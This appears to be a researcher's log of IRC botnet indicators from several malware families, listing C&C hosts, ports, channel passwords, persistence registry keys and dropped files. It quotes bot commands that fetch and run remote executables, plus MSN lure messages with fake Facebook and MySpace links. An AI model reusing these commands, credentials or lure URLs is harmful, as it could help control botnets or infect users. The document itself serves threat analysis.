brawl.izthewiz.net (Blazebot) code by crim

*** IP of : 64.202.107.25 dns brawl.izthewiz.net
64.202.107.25:15433
Url exe: http://www.facebook-photo.net/images/pic9523846/
http://softwareshouse.com/clown/load.exe (bot)

C&C Server
USER R9aOi0GUERM1 qqljkaxf qqljkaxf qqljkaxf qqljkaxf
NICK: B13|NEW|USA|2K|VMDQVHTCZPK60U4
Channel: ##XTC##
JOIN: WwUd1X89I0 ##XTC## ........................
Topic:##XTC##:+BLZbopuX!bTgF6.hUEd71rSW9r06R5fL0EgKAq1IEXE5.Zp.1A05DyN7.Zsbd.!

auto startup path install as services
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\blazedworm]
Type = 0x00000001
Start = 0x00000003
ErrorControl = 0x00000000
ImagePath = "%System%\drivers\blazedworm.sys"
DisplayName = "blazedworm Driver"
Drop executable
C:\Documents and Settings\User\Application Data\WinNT\winlogon.exe
C:\Documents and Settings\User\Desktop\blazedworm.sys
C:\RECYCLER\blazewrm.vmx
more detail
http://threatinfo.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=WORM%5FBLAZEBOT%2EA&VSect=T

ad.chfo991.com

ad.chfo991.com DNS_TYPE_A 174.133.29.34
174.133.29.34:8585
Nick: [00|USA|030091]
Username: XP-0220
Server Pass: letmein
Joined Channel: #maya with Password open
Channel Topic for Channel #maya: "P http://pic-facebook.com/id.php?="
Private Message to Channel #maya: "msn// Thread Activated: Sending Message."

x.chfo991.com (Agobot)

x.chfo991.com
174.133.29.34:1934
PASS wimax
NICK [00-USA-XP-2103030]
USER SP2-rel * 0 :COMPUTERNAME
Channel: #x
Topic: '-s.stop|-http http://img-facebook.com/ub.exe|-s.start 75 3 2'
* Set by ok on Sun Jun 21 18:01:43
Install as service
DisplayName = "MSC VSCS Service"
mscvscs.exe (%Windir%\system\mscvscs.exe)

box22.fel0ny.com (DCI BOT)

*** IP of : 67.212.185.170 host box22.fel0ny.com
67.212.185.170:4244
Channel: #chat1 chat01
NICK: blovhb
USER: bkqexh "" "lqb" :bkqexh
Autostart path
install component
{36f8ec70-c29a-11d1-b5c7-0000f8051515}
STubPath C:\RECYCLER\S-1-5-21-1482476501-1644491937-682003330-1013\windowsupdate.com

nono.burimche.net

nono.burimche.net DNS_TYPE_A 75.102.25.9
75.102.25.9:7777
Nick: VirUs-crhwgypr
Username: VirUs
Server Pass: Virus
Joined Channel: #!lol!# with Password bubulim
Channel Topic for Channel #!lol!#: "^C0,12 No Bots."

msn.update-host.com

msn.update-host.com dns 78.129.158.87: 1863

User Name: XP-2460
Real Name: MICHAEL-F156CF7
Password: owned
Nick Name: [N00|USA|236919]
Channel
Name: #!msn1!
Password: msnone
Topic Deleted: :!msn.stop|!msn.msg hey, is this you ?! :) http://yourflirtspace.dyns.net/photo.php?=

dddd.burimche.net

dddd.burimche.net DNS_TYPE_A 218.61.22.10

218.61.22.10:4244
Nick: [00|USA|457570]
Username: XP-5088
Server Pass: letmein
Joined Channel: ##bb## with Password bole
Channel Topic for Channel ##bb##: "P ? http://facebook-imageview.com/photos/profile.php?="
Private Message to Channel ##bb##: "msn// Thread Activated: Sending Message."
Private Message to Channel ##bb##: "msn// Thread Disabled."

cache.stupidnsm.cn

cache.stupidnsm.cn DNS_TYPE_A 72.44.39.110

72.44.39.110:4244
Nick: [00|USA|832824]
Username: XP-7068
Joined Channel: #!dll! with Password dc
Channel Topic for Channel #!dll!: "$ http://myspace-image.com/viewimage.php?="
Private Message to Channel #!dll!: "D fun. http://myspace-image.com/viewimage.php?="
Private Message to Channel #!dll!: ".login hidden"
Private Message to Channel #!dll!: "msn// Thread Activated: Sending Message."
Private Message to Channel #!dll!: ".login hidden -s"
Private Message to Channel #!dll!: ".r.getfile http://nighthosting.info/rape.exe c:\rape.exe 1"
Private Message to Channel #!dll!: ".r.getfile http://nighthosting.info/rape.exe c:\rapxe.exe 1 "
Private Message to Channel #!dll!: "P http://myspace-image.com/viewimage.php?="
Private Message to Channel #!dll!: "download// transfer thread already running: <1>."
Private Message to Channel #!dll!: "main// Welcome."
Private Message to Channel #!dll!: ".r.getfile http://nighthosting.info/xx.exe c:\xpxe.exe

msn.update-host.com

msn.update-host.com
194.25.24.122:1863
Nick: [N00USA378011]
Username: XP-4485
Server Pass: owned
Joined Channel: #!msn1! with Password msnone
Channel Topic for Channel #!msn1!: "D http://www.msnspaces.dyns.net/image.php?="
Private Message to Channel #!msn1!: "msn// Thread Activated: Sending Message."
Private Message to Channel #!msn1!: "msn// Thread Disabled."

fix.mainmsn.net

fix.mainmsn.net DNS_TYPE_A 194.25.24.122
194.25.24.122:1863
Nick: [N00|USA|603346]
Username: XP-5568
Server Pass: owned
Joined Channel: #!msn1! with Password msnone
Channel Topic for Channel #!msn1!: "D http://www.face-book.dyns.net/image.php?="
Private Message to Channel #!msn1!: "msn// Thread Activated: Sending Message."
Private Message to Channel #!msn1!: "msn// Thread Disabled."

nono.burimche.net

nono.burimche.net DNS_TYPE_A 74.3.192.201

74.3.192.201:7777
Nick: VirUs-zmjyfmwb
Username: VirUs
Server Pass: Virus
Joined Channel: #!lol!# with Password bubulim

gt.irshad.biz

gt.irshad.biz:7000
Channel: #gt#

lol.burimche.net

lol.burimche.net DNS_TYPE_A 89.255.10.90

89.255.10.90:1988

Nick: [00|USA|349782]
Username: XP-7873
Joined Channel: #!lol!# with Password bubulim
Channel Topic for Channel #!lol!#: ".msn.msg new welcome all http://www-facebook.org/images.php?="
Private Message to Channel #!lol!#: "msn// Thread Activated: Sending Message."

irc2.alphairc.com

irc2.alphairc.com:4444
Channel: #cocaine-city

abc.ihshsd8.com

abc.ihshsd8.com:9283
Channel: ##russia##

m.alm7.net

m.alm7.net:7000
Channel: #omar #s #gt# #Gt

61.136.69.197

61.136.69.197:1863
Channel: #!msn1! pass: msnone

kao.th3kings.net

kao.th3kings.net DNS_TYPE_A 203.154.27.138
203.154.27.138:3333
Nick: [00|USA|752002]
Username: XP-2292
Joined Channel: #!zx!# with Password zidanag
Channel Topic for Channel #!zx!#: ".msn.msg Estas Foto so Tuyo?? http://best-fotos.com/badgirl.exe?="
Private Message to Channel #!zx!#: "msn// Thread Activated: Sending Message."